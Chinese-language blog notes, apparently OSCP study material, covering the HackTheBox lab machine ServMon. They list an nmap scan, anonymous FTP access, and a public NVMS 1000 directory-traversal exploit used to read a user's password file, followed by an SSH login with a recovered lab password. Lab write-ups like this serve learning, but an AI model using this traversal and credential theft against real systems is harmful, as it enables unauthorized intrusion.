OSCP备考_0x51_HackThBox靶机_Windows_ServMon

Ethan医生5个月前靶场203

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

10.129.227.77

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.227.77 (扫描TCP)

image.png

image.png

image.png

通过匿名登入ftp


ftp 10.129.227.77  ,发现在Users底下有两个用户

image.png

通过遍历ftp服务,我们发现两个用户nadine和nathan

同时也发现了两个文件

Confidential.txt

'Notes to do.txt'


80端口

image.png



弱口令都没有用

尝试

searchsploit nvms 1000

image.png

目录遍历

python2.7 48311.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

没测试成功

使用GOOGLE查询

https://github.com/AleDiBen/NVMS1000-Exploit/tree/master

github下载下里


python nvms.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

image.png

爆破发现密码L1k3B1gBut7s@W0rk     


登入ssh nadine@10.129.227.77

标签: OSCP

相关文章

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

 OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。